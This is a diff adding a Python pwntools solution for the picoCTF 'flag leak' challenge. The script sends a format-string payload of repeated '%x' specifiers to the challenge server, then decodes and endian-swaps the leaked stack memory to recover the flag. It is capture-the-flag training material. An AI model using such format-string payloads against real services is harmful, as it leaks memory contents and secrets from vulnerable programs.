flag leak

flag_leak/sol.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_size = 127
+hex_to_read = 127//2
+hex_reader = b'%x'*hex_to_read
+payload = hex_reader + b'.'
+log.info(f"payload: {payload}")
+
+def endian_swap(s, offset=0):
+    result = b''
+    for i in range(3+offset, len(s), 4):
+        result += bytes(reversed(s[i-3:i+1]))
+    return result
+
+conn = remote("saturn.picoctf.net", 65206)
+
+conn.recvuntil(b" >> ")
+conn.sendline(payload)
+conn.recvline()
+data = conn.recvline(keepends=False)[:-1]
+log.info(f"received data: {data}")
+unhexed_data = unhex(data)
+for i in range(4):
+    endian_swapped_data = endian_swap(unhexed_data, offset=i)
+    if b"picoCTF" in endian_swapped_data:
+        break
+log.info(f"processed data: {endian_swapped_data}")
+